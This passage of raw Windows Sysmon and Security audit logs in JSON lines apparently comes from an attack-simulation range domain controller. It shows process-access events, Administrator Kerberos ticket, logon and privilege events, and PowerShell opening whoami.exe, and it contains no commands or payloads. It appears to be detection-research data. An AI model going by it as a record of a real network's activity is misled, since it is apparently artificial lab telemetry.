ll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2578,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.391\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.391","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2579,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.391\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.391","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220361,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220362,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{E50135F7-BF80-2E10-0465-5DE964C29E4C}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{E50135F7-BF80-2E10-0465-5DE964C29E4C}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220363,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{E50135F7-BF80-2E10-0465-5DE964C29E4C}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{E50135F7-BF80-2E10-0465-5DE964C29E4C}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220364,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x481D7\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{E50135F7-BF80-2E10-0465-5DE964C29E4C}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x481d7","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{E50135F7-BF80-2E10-0465-5DE964C29E4C}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220365,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x481D7\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x481d7","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2580,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.391\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.391","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2581,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.391\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.391","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2582,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.391\r\nSourceProcessGUID: {41C8662E-1F8C-5F25-0000-0010A6800400}\r\nSourceProcessId: 4492\r\nSourceThreadId: 4604\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-1F8C-5F25-0000-0010B28C0400}\r\nTargetProcessId: 4608\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6abb2f4b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6a054025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6a053cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6ab0510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6a01488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6a072d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.n